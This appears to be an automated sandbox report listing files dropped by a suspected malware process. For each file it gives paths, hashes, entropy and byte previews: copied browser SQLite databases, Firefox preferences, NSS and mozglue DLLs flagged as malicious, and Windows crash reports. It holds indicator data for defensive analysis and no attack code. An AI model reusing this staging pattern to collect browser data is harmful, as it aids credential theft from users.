SHA-512:	312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\DAKFID

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\DAKFID-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\ECAEGH

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.136413900497188
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
MD5:	429F49156428FD53EB06FC82088FD324
SHA1:	560E48154B4611838CD4E9DF4C14D0F9840F06AF
SHA-256:	9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
SHA-512:	1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\FCFBGI

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	155648
Entropy (8bit):	0.5407252242845243
Encrypted:	false
SSDEEP:	96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
MD5:	7B955D976803304F2C0505431A0CF1CF
SHA1:	E29070081B18DA0EF9D98D4389091962E3D37216
SHA-256:	987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
SHA-512:	CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
Malicious:	false
Preview:	SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\GDHIII

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.03859996294213402
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
MD5:	D2A38A463B7925FE3ABE31ECCCE66ACA
SHA1:	A1824888F9E086439B287DEA497F660F3AA4B397
SHA-256:	474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
SHA-512:	62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\GDHIII-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\GIEHID

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8439810553697228
Encrypted:	false
SSDEEP:	24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
MD5:	9D46F142BBCF25D0D495FF1F3A7609D3
SHA1:	629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
SHA-256:	C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
SHA-512:	AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\GIIDBG

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	ASCII text, with very long lines (1743), with CRLF line terminators
Category:	dropped
Size (bytes):	9504
Entropy (8bit):	5.512408163813622
Encrypted:	false
SSDEEP:	192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
MD5:	1191AEB8EAFD5B2D5C29DF9B62C45278
SHA1:	584A8B78810AEE6008839EF3F1AC21FD5435B990
SHA-256:	0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
SHA-512:	86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\DGHIECGCBKFH\HIDAFH

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.5394293526345721
Encrypted:	false
SSDEEP:	96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
MD5:	52701A76A821CDDBC23FB25C3FCA4968
SHA1:	440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
SHA-256:	D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
SHA-512:	2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\HIDBFC

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\freebl3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	685392
Entropy (8bit):	6.872871740790978
Encrypted:	false
SSDEEP:	12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
MD5:	550686C0EE48C386DFCB40199BD076AC
SHA1:	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
SHA-256:	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
SHA-512:	0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2.exe, Detection: malicious, Browse Filename: 4.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\mozglue.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2.exe, Detection: malicious, Browse Filename: 4.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: CHA0VZiz8y.exe, Detection: malicious, Browse Filename: jE4zclRJU2.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win64.Evo-gen.30302.14698.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Win32.Malware-gen.198.6512.exe, Detection: malicious, Browse
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\msvcp140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\nss3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\softokn3.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\DGHIECGCBKFH\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\kat2225.tmp
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_A247.exe_913f69c4d42465caa03af44e502f728cdcf74344_7f64f70c_c718d536-0932-499a-b4fd-057bd6fe0023\Report.wer

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9895434334418858
Encrypted:	false
SSDEEP:	96:HwvHULwJsdhqnF/7qnIfqBQXIDcQ9c6ScEOcw3n+HbHg/8BRTf32rLOyKZzTvSEt:QvgwJjoM0zWUwjvPF7zuiFoZ24IO8h3
MD5:	C4A94485CBBE9434E2C71B9351DE8392
SHA1:	8741F01322108301415C1A2F5BD864EE01E2A294
SHA-256:	9F72E77B7AD3D03B8C3A2D47FDD37C0D8C46677A97BA3CF4B770D4A9EABAB11E
SHA-512:	A0405273B7B874A6BAFF568959E21BDF4CB3D38EDF9D925712097374DA7989C25F0B1062AF5E4832655EB5ECC6ADBD52A2CB3073716F1498CA6E128E1E155DF1
Malicious:	false
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.1.1.8.5.8.6.5.5.8.0.2.1.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.1.1.8.5.8.6.5.9.8.6.4.6.6.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.7.1.8.d.5.3.6.-.0.9.3.2.-.4.9.9.a.-.b.4.f.d.-.0.5.7.b.d.6.f.e.0.0.2.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.f.f.d.6.8.5.0.-.a.d.c.7.-.4.5.6.7.-.a.d.0.5.-.9.8.4.d.b.b.0.8.1.1.3.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.A.2.4.7...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.8.3.c.-.0.0.0.1.-.0.0.1.4.-.6.1.1.a.-.2.6.f.6.4.6.a.f.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.9.3.d.c.4.9.a.7.c.d.a.1.8.0.7.a.e.e.d.b.8.e.1.6.4.8.1.b.c.1.c.0.0.0.0.f.f.f.f.!.0.0.0.0.4.6.e.8.9.a.f.e.b.6.1.c.1.d.0.8.5.2.4.1.2.4.8.0.e.e.2.0.2.d.4.8.c.7.d.5.a.c.e.b.!.A.2.4.7...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.0.5.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER380E.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Sun May 26 08:31:05 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	52914
Entropy (8bit):	2.8298825309677444
Encrypted:	false
SSDEEP:	384:sKnEG2XTB2L3ffax0JXfDzRJwyFntdhOM7:sKnWTBEn20hfvE4Phd
MD5:	BCEC78C9CA691430E93988BB7A189862
SHA1:	D1CFF0CA55CE8DE2818EC3D68BB70305B21503C1
SHA-256:	A9E1B284F1777E109D04E9689C23B324FC71780A75FDF1ADE554A4ECE25C7957
SHA-512:	F84342FE5E2F9D7C88F9E2F70B00822769C2CFEA878DD39479FD2F47C25828510AEBD5707DD2A884F80704587E46D724DD4FF0C159917F65886E4C2037FC51B5
Malicious:	false
Preview:	MDMP..a..... .......I.Rf............4...............H........................1..........`.......8...........T............>..............x ..........d"..............................................................................eJ......."......GenuineIntel............T.......<...#.Rf............................. ..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38CB.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8288
Entropy (8bit):	3.696275609127764
Encrypted:	false
SSDEEP:	192:R6l7wVeJ+wr6KZ6YEIVSUDIgmfPTppDM89bQ3sfzQm:R6lXJN6c6YEaSUDIgmfPT1Q8fB
MD5:	B829F7D3D0F16A225CC3B518ECBA6556
SHA1:	D87A082EA5D50D9176EDE9D797D6ECD65A65B703
SHA-256:	B9F8AF5397740B544EF587AF1D46529E5968425C448448CE5362ACB8FC17A0D5
SHA-512:	F7D7F91EC8DB4344426F887E37BB4FC45EA1F80B974C62879FCEA51367C0F6D9389F6C3D9510E3C9B5D18AFFA8504722DF9ECCA0C284E22B5952F6174B25858B
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.2.0.4.<./.P.i.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER38EB.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4537
Entropy (8bit):	4.4299172037061005
Encrypted:	false
SSDEEP:	48:cvIwWl8zsHFJg77aI9o2UNWpW8VYFYm8M4Jz/FDhd+q8mCZGRTmYT/5d:uIjf/I7HT7VtJpyGRTjT/5d
MD5:	4B0FAC13A427357506638DBA1C54DBF8
SHA1:	4CB5CCBB1D1E95E80ECFCA323E80A2820E7ACE0B
SHA-256:	CBEBCFE209B72BFCEE8C22CC39C3624004F8DA0B29FEBC198DE770CCCA2A74C8
SHA-512:	1C688741E063B78A4A6633796B57501EB46BB3CFF3D5099CC5D19994B41E999D7E2EE6F8D5B394A68D6BFE61ADB45B508AA1357E57DD1487CF691EABF91D4BC4
Malicious:	false
